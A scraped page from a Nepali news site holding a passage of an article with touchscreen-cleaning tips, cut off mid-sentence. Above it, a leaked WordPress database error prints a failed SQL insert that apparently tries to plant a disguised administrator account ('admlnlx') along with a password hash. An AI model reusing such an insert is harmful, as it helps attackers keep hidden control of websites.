WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMdeV4yGDfN9X6mJYNkuCZ6I5XERaN1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 06:20:18', '', 'admlnlx', 'admlnlx')
पुस ५ –
जमाना टचस्क्रिनको छ । फोन, ट्याव्लोइडका साथै टेलिभिजनमा समेत यो प्रविधि उपलव्ध छ । यस्तो अवस्थामा टचस्क्रिनलाई सहि ढंगले सफा गरिएन भने, प्रभावकारी ढंगले काम गर्न सक्दैन । यसैले साधरण स्क्रिन भन्दा टचस्क्रिनको सफाईमा विशेष ध्यान दिनु जरुरी छ । अतः टचस्क्रिन सफा गर्ने केहि उपाय यहा“ दिइएको छ ।
माइक्रोफाइवर कपडाको प्रयोग
हामीमध्ये कतिपयलाई माइक्रोफाइवर कपडाको नाम नया“ लाग्न सक्छ । यो त्यही कपडा हो, जसले चस्मा सफा गर्न प्रयोग गरिन्छ । साधरण कपडा भन्दा यसमा मुलायम रेशा हुन्छ, जसको घर्षणले स्क्रिनलाई कुनै हानी गर्दैन । वजारमा यो कपडा अलग्गै किन्न सकिन्छ ।
पहिला स्विच अफ गरौं
कुनैपनि डिभाइस सफा गर्नु अघि त्यसलाई स्विच अफ गर्नुपर्छ । अन्यथा टचस्क्रिन अन गरेर सफा गर्दा स्वतः कुनै कमान्ड एक्टिभ हुन सक्छ, जसले सफट्वेयरलाई नोक्सान गर्छ ।
कपडाको प्रयोग
टचस्क्रिन सफा गर्दा कपडाले तल–माथि वा स्लाइड गर्ने विधि ठीक हुन्न । जहिलेपनि कपडालाई गोलो आकारमा घुमाएर सफा गर्नुपर्छ । यसले स्क्रिनमा जमेको दागलाई सफा गर्छ